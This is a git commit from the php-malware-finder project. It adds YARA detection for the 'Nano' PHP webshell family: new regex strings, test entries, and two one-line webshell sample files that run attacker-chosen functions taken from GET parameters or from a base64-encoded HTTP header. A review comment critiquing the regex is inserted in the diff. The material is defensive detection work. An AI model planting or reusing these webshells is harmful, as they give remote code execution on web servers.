authorjvoisin2018-05-29 13:20:40 +0200
committerjvoisin2018-05-29 13:20:40 +0200
commita5cc4cccc1a6c66210056194b8bd5638855fd09b (patch)
tree8a674afc56bc5bdc099b8ea33ea061af562e4ae9
parent9c4fb73b330e10395e1627d73e46a855e236ad29 (diff)
Add detection for Nano
[Nano]( https://github.com/UltimateHackers/nano ) is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.
-rw-r--r--README.md1
-rw-r--r--php-malware-finder/php.yar2
-rw-r--r--php-malware-finder/samples/real/nano.php1
-rw-r--r--php-malware-finder/samples/real/ninja.php1
-rwxr-xr-xphp-malware-finder/tests.sh3
5 files changed, 8 insertions, 0 deletions
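diff --git a/README.md b/README.md
index 01d1401..c458785 100644
--- a/README.md
+++ b/README.md
@@ -38,6 +38,7 @@ The following list of encoders/obfuscators/webshells are also detected:
 * [web-malware-collection]( https://github.com/nikicat/web-malware-collection )
 * [webtoolsvn]( http://www.webtoolsvn.com/en-decode/ )
 * [novahot]( https://github.com/chrisallenlane/novahot )
+* [nano]( https://github.com/UltimateHackers/nano )
 
 
 Of course it's **trivial** to bypass PMF,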
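diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index f0abcb4..143b192 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -65,6 +65,8 @@ rule ObfuscatedPhp
 $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k
 $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher
 $c99_launcher = /;\$\w+\(\$\w+(,\s?\$\w+)+\);/ // http://bartblaze.blogspot.fr/2015/03/c99shell-not-dead.html
+$nano = /\$[a-z0-9-_]+\[[^]]+\]\(/ //https://github.com/UltimateHackers/nano
+$ninja = /base64_decode[^;]+getallheaders/ //https://github.com/UltimateHackers/nano
 $variable_variable = /\${\$[0-9a-zA-z]+}/
 $too_many_chr = /(chr\([\d]+\)\.){8}/ // concatenation of more than eight `chr()`
 $concat = /(\$[^\n\r]+\.){5}/ // concatenation of more than 5 words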
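Review bot: The `$nano` string on the first added line is broad enough to hit ordinary PHP: `$x[k](` is the normal syntax for invoking a callable stored in an array (e.g. `$handlers[$event]($payload)`), so on its own it will match a lot of benign code, and whether that is acceptable depends on the rule's `condition`, which lies outside this hunk. Its character class `[a-z0-9-_]` is also lowercase-only, unlike the `\$\w+` form the neighbouring `$align` and `$c99_launcher` strings use, so `$nano = /\$\w+\[[^]]+\]\(/` would keep the strings consistent and cover the same variable names the sibling patterns do. The comment on the `$ninja` line repeats the nano URL; if ninja is a distinct variant within that family, naming it in the comment (`// nano family, "ninja" header-based variant`) would tell a reader why two strings cite one reference.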
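diff --git a/php-malware-finder/samples/real/nano.php b/php-malware-finder/samples/real/nano.php
new file mode 100644
index 0000000..14df255
--- /dev/null
+++ b/php-malware-finder/samples/real/nano.php
@@ -0,0 +1 @@
+<?$x=$_GET;($x[p]=='_'?$x[f]($x[c]):y);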
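diff --git a/php-malware-finder/samples/real/ninja.php b/php-malware-finder/samples/real/ninja.php
new file mode 100644
index 0000000..fdace58
--- /dev/null
+++ b/php-malware-finder/samples/real/ninja.php
@@ -0,0 +1 @@
+<?$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);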
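diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index f4d9e06..aa6cd33 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -86,6 +86,9 @@ run_test real/ice.php 'double_var'
 run_test real/srt.php '$register_function'
 run_test real/awvjtnz.php '$reversed:'
 run_test real/exceptions.php '$eval_comment: eval/\*k\*/('
+run_test real/nano.php '$nano: $x\[f\]('
+run_test real/ninja.php '$nano: $x\[0\]('
+run_test real/ninja.php '$ninja: base64_decode(substr(getallheaders'
 
 run_test undetected/smart.php '0x6:$extract:'
 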